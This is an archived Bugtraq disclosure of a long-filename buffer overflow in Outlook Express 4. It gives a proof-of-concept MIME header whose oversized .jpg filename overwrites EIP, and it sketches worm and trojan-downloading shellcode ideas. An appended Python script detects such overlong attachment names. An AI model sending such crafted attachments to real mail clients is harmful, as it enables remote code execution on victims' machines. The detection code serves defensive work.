Bugtraq mailing list archives
Overflow in Outlook Express 4.* - too long filenames with graphic format extension
From: Ultor () HERT ORG (Ultor)
Date: Fri, 12 May 2000 14:05:28 +0200
==== APPLICATION AFFECTED

Outlook Express 4.* (5.* is not affected)

==== DESCRIPTION

All attached graphic files are automatically shown in Outlook Express while viewing the e-mail. The problem is that long filenames with a *.jpg or *.bmp extension cause an overflow if the filename length is longer than 256 characters.

==== EXAMPLE

We need more than 267 characters to overwrite EIP because of 'C:\TEMP' at the beginning of the buffer. This makes exploitation a little problematic. Here is an example of such an e-mail:

------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain; name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"

------=_NextPart_000_0008_01BF5479.70140740--

EIP is overwritten here by 'BBBB'.

==== EXPLOITATION

It's a little hard to exploit because the buffer is at an address containing '00' and we get 'C:\TEMP' which overwrites the stack before our data. You will need some tricks to exploit this.

I believe this bug could be very dangerous if connected somehow with a worm, because you would only have to view the message to run the exploit. Using shellcode which downloads a trojan from some URL onto the affected machine would be an interesting idea too.

Greetz to HERT, Lam3rZ, TESO

----------------------
Mark Bialoglowy [Ultor () hert org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------

attached mail follows:
message/rfc822 attachment: crash_oe.eml
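The condition described in the post (an attachment name with a graphic extension longer than 256 characters, carried in the Content-Disposition filename or the Content-Type name parameter) is easy to flag at a mail gateway or in a mailbox scan before a client ever renders the message. The following is an added example, not code from the post or from HERT: it uses Python's standard email parser, takes the 256-character threshold and the .jpg/.bmp extensions from the post, and builds its own constructed sample message. The function and constant names, the boundary string and the sample addresses are hypothetical.

```python
import email
from email.utils import collapse_rfc2231_value

# Threshold and extension list as stated in the advisory above; the rest of
# this module (names, sample builder) is hypothetical example code.
MAX_FILENAME_LENGTH = 256
GRAPHIC_EXTENSIONS = (".jpg", ".bmp")

# Constructed boundary for the sample message (not from a real mail).
BOUNDARY = "----=_NextPart_constructed_sample"


def build_sample(filename: str) -> bytes:
    """Build a constructed multipart message with one attachment whose
    Content-Disposition filename is `filename`. Sample input only."""
    raw = (
        "From: sender@example.invalid\r\n"
        "To: recipient@example.invalid\r\n"
        "Subject: constructed sample\r\n"
        "MIME-Version: 1.0\r\n"
        f'Content-Type: multipart/mixed; boundary="{BOUNDARY}"\r\n'
        "\r\n"
        f"--{BOUNDARY}\r\n"
        "Content-Type: text/plain\r\n"
        "\r\n"
        "body text\r\n"
        f"--{BOUNDARY}\r\n"
        'Content-Type: image/jpeg; name="pic.jpg"\r\n'
        "Content-Transfer-Encoding: base64\r\n"
        f'Content-Disposition: attachment; filename="{filename}"\r\n'
        "\r\n"
        "/9j/4AAQSkZJRg==\r\n"
        f"--{BOUNDARY}--\r\n"
    )
    return raw.encode("ascii")


def attachment_names(part) -> list:
    """Every name a client might use for this part: the Content-Disposition
    filename and the Content-Type name parameter (the advisory's sample sets
    both, to different values). RFC 2231 encoded values are collapsed."""
    names = []
    for value in (part.get_filename(), part.get_param("name")):
        if value:
            names.append(collapse_rfc2231_value(value))
    return names


def overlong_graphic_attachments(raw: bytes, limit: int = MAX_FILENAME_LENGTH) -> list:
    """Return one finding per MIME part whose attachment name has a graphic
    extension and exceeds `limit` characters. Only the length and the
    extension are reported, so the log never carries the full name."""
    msg = email.message_from_bytes(raw)
    findings = []
    for index, part in enumerate(msg.walk()):
        if part.is_multipart():
            continue
        for name in attachment_names(part):
            if name.lower().endswith(GRAPHIC_EXTENSIONS) and len(name) > limit:
                findings.append({"part": index, "length": len(name), "suffix": name[-4:]})
                break
    return findings


if __name__ == "__main__":
    for label, name in (("overlong", "A" * 300 + ".jpg"), ("normal", "photo.jpg")):
        print(label, overlong_graphic_attachments(build_sample(name)))
```

The check looks at both name-carrying parameters rather than only `get_filename()`, because a client may pick either one, and a message can set them to different values exactly as the sample in the post does. Lowering `limit` gives a margin below the point where the post says the name starts to overwrite the saved return address.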